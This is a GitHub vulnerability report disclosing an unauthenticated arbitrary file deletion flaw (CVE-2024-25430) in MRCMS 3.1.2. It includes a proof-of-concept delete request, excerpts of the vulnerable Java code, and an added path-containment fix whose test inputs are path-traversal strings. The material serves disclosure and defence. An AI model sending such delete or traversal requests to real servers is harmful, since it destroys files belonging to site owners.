wuweiit / mushroom

MRCMS is a Java-based dynamic content management system
http://cms.yl-blog.com
MIT License

MRCMS 3.1.2 has an arbitrary file deletion vulnerability #20

Open xia0chensec opened 7 months ago

xia0chensec commented 7 months ago

[The name of an affected Product]

MRCMS

[The affected or fixed version]

v3.1.2

[CVE ID] CVE-2024-25430

[Vulnerability Type]

Arbitrary file deletion vulnerability

[Vulnerability Description]

MRCMS 3.1.2 has an arbitrary file deletion vulnerability

[Vulnerability details]

The vulnerability exists at: http://localhost:8080/admin/file/delete.do?path=/&name=

1. Select Content -> File management

2. Click the delete button

Try deleting the test.txt file

POC

GET /admin/file/delete.do?path=/&name=test.txt HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 0


code discovery

Code path: MRCMS\src\main\java\org\marker\mushroom\controller\FileController.java

@ResponseBody
@RequestMapping("/delete")
public Object delete(@RequestParam("path") String path, @RequestParam("name") String name){

    if(fileManager.checkPath(path)){
        return new ResultMessage(false, "路径检查异常,删除失败!");
    }

    // the request-controlled path and name are concatenated onto the web root
    // and the resulting File is handed straight to the delete routine
    File file = new File(WebRealPathHolder.REAL_PATH + encoding(path + File.separator + name));
    return fileManager.delete(file);

}

The code takes in the path and name variables: the directory is specified through path, and the file/directory name through name.

Code path: MRCMS\src\main\java\org\marker\mushroom\utils\FileTools.java

Users can delete arbitrary files without authorization because authentication is not used before file deletion.

public boolean deleteFolder(File delFolder) {
    // Check whether the directory or file exists
    if (!delFolder.exists()) { // return false if it does not exist
        return false;
    } else {
        // Check whether it is a file
        if (delFolder.isFile()) { // for a file, call the file deletion method
            return deleteFile(delFolder);
        } else { // for a directory, call the directory deletion method
            return deleteDirectory(delFolder);
        }
    }
}
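Added example, not MRCMS's own code: a containment check that canonicalises the user-supplied path and name against the web root before any delete is attempted, which is the check missing from the controller and FileTools code quoted above. WEB_ROOT stands in for WebRealPathHolder.REAL_PATH and the class name is an assumption; enforcing authentication on the endpoint is a separate fix the report also points out.

```java
import java.nio.file.Path;
import java.nio.file.Paths;

// Hypothetical helper for this example; WEB_ROOT is an assumed stand-in for the CMS web root.
public class SafeDeleteCheck {

    public static final Path WEB_ROOT = Paths.get("/var/www/mrcms").toAbsolutePath().normalize();

    // Returns the resolved target only if it stays inside root; null means refuse the delete.
    public static Path resolveInsideRoot(Path root, String path, String name) {
        if (path == null || name == null || name.isEmpty()) {
            return null;
        }
        // The file name must be a single path element: no separators, no "." or "..".
        if (name.contains("/") || name.contains("\\") || name.equals("..") || name.equals(".")) {
            return null;
        }
        // Strip leading separators so a path of "/" is relative to root, not the filesystem root
        // (Path.resolve would otherwise let an absolute argument replace root entirely).
        String relative = path.replaceFirst("^[/\\\\]+", "");
        Path target = root.resolve(relative).resolve(name).normalize();
        // Containment check after normalisation: ".." segments have been collapsed,
        // so a target that escaped root no longer starts with it.
        if (!target.startsWith(root) || target.equals(root)) {
            return null;
        }
        return target;
    }

    public static void main(String[] args) {
        // Constructed inputs: the PoC value from the report and two traversal attempts.
        System.out.println(resolveInsideRoot(WEB_ROOT, "/", "test.txt"));
        System.out.println(resolveInsideRoot(WEB_ROOT, "/../../etc", "passwd"));
        System.out.println(resolveInsideRoot(WEB_ROOT, "uploads", "../web.xml"));
    }
}
```

Only a non-null result should ever reach deleteFolder, and the caller should still verify the requester's session and role before acting on it.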